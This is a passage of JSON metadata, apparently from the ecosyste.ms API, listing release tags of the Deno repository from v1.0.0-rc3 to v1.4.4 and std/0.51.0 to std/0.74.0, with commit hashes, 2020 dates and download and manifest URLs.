land/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1